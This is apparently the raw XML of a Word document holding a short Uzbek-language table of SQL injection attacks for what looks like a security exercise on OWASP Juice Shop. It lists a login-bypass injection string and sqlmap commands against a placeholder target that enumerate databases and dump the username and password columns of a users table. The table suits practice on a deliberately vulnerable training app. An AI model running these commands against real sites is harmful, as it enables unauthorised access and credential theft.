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4"/>
        <w:gridCol w:w="2314"/>
        <w:gridCol w:w="4133"/>
        <w:gridCol w:w="2414"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E0AEC" w14:paraId="34F9F5C8" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24D6B09B" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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314" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B41FA55" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4133" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D2D686C" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2414" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="220BAD09" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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izoh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E0AEC" w:rsidRPr="00852D50" w14:paraId="080242B4" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7456C661" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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14" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40057771" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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Owasp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juice shop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4133" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CC3FBCD" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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‘ 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1=1;--</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2414" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="759FA177" w14:textId="77777777" w:rsidR="007E0AEC" w:rsidRPr="007E0AEC" w:rsidRDefault="007E0AEC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qismiga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yozib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buzib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komandasida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ishlatiladi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52D50" w:rsidRPr="00852D50" w14:paraId="583BFC59" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9932C" w14:textId="104CC34B" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2314" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C1FEF3A" w14:textId="72CE9BAF" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50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Sql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injection </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4133" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="302961A8" w14:textId="3D2572ED" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="007E0AE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sqlmap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-u </w:t>
            </w:r>
            <w:hyperlink r:id="rId4" w:history="1">
              <w:r w:rsidRPr="00852D50">
                <w:rPr>
                  <w:rStyle w:val="a4"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://target.com/index.php?id=1</w:t>
              </w:r>
            </w:hyperlink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 --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dbs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2414" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E943EDA" w14:textId="326AE231" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="00852D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Saytdagi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sql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injection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ni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ishlatish</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852D50" w:rsidRPr="00852D50" w14:paraId="0015696B" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="096E751F" w14:textId="5079F055" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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2314" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D8FD5C4" w14:textId="1EA0FB6F" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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Sql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injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4133" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4208A030" w14:textId="5080EC2E" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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sqlmap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-u "http://target.com/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index.php?id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=1" -D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database_n</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0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ame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-T users --columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2414" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FF61F23" w14:textId="7CF192C0" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="00852D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Saytdagi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sql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injection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ni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ishlatish</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852D50" w:rsidRPr="00852D50" w14:paraId="139552CF" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="040F77CB" w14:textId="629687C5" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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2314" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6073470A" w14:textId="0A113EC5" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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Sql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injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4133" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41792F7D" w14:textId="5E46375E" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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sqlmap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-u "http://target.com/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index.php?id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=1" -D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database_name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-T users -C </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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username,password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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--dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2414" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="611F949E" w14:textId="55C4BF36" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="00852D50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Saytdagi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sql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injection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ni</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00852D50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ishlatish</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00852D50" w:rsidRPr="00852D50" w14:paraId="0528D95D" w14:textId="77777777" w:rsidTr="00852D50">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="091E824A" w14:textId="0B277C50" w:rsidR="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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314" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7279016F" w14:textId="77777777" w:rsidR="00852D50" w:rsidRDefault="00852D50" w:rsidP="0085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33" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2738F424" w14:textId="77777777" w:rsidR="00852D50" w:rsidRPr="00852D50" w:rsidRDefault="00852D50" w:rsidP="00852D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14" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EFAC372" w14:textId="77777777" w:rsidR="00852D50" w:rsidRDefault="00852D50" w:rsidP="00852D5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59C5993A" w14:textId="7012E78E" w:rsidR="00DA12C8" w:rsidRDefault="00DA12C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4A17D1" w14:textId="55806FB0" w:rsidR="00D43E29" w:rsidRDefault="00D4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4986B5" w14:textId="0EC1AA72" w:rsidR="00D43E29" w:rsidRDefault="00D4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B47EFA" w14:textId="45781310" w:rsidR="00D43E29" w:rsidRDefault="00D43E2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02947" w14:textId="11BC41D1" w:rsidR="00D43E29" w:rsidRDefault="00D43E29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484"/>
        <w:gridCol w:w="2961"/>
        <w:gridCol w:w="2952"/>
        <w:gridCol w:w="2954"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D43E29" w14:paraId="4653A8B6" w14:textId="77777777" w:rsidTr="00D43E29">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="054C0196" w14:textId="163E64B0" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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№</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2961" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FE5875F" w14:textId="72A96623" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2952" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="338723F9" w14:textId="0EB6567E" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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  <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2954" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="627BE6D7" w14:textId="5598F908" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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izoh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43E29" w:rsidRPr="00852D50" w14:paraId="601B216E" w14:textId="77777777" w:rsidTr="00D43E29">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="177156F6" w14:textId="5EA1614B" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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961" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7221E4DE" w14:textId="701E68C3" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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Owasp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juice shop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2952" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1956201F" w14:textId="40FCB7F5" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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3E2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https://demo.owasp-juice.shop/#/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2954" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="181B0853" w14:textId="500CFA1F" w:rsidR="00D43E29" w:rsidRDefault="00D43E29" w:rsidP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qismiga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yozib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buzib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kirish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komandasida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ishlatiladi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D43E29" w14:paraId="47254B8A" w14:textId="77777777" w:rsidTr="00D43E29">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479EE2B3" w14:textId="3A29F7C3" w:rsidR="00D43E29" w:rsidRDefault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61" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="356BD1CF" w14:textId="77777777" w:rsidR="00D43E29" w:rsidRDefault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2" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="045CB171" w14:textId="77777777" w:rsidR="00D43E29" w:rsidRDefault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54" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="730FFB36" w14:textId="77777777" w:rsidR="00D43E29" w:rsidRDefault="00D43E2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E35AB2A" w14:textId="77777777" w:rsidR="00D43E29" w:rsidRPr="007E0AEC" w:rsidRDefault="00D43E2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43E29" w:rsidRPr="007E0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EC"/>
    <w:rsid w:val="007E0AEC"/>
    <w:rsid w:val="00852D50"/>
    <w:rsid w:val="00D43E29"/>
    <w:rsid w:val="00DA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2F14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C8C1126-E3E7-4ECE-B209-AF20298D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0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52D5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target.com/index.php?i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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>0001</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-24T05:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-05T05:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>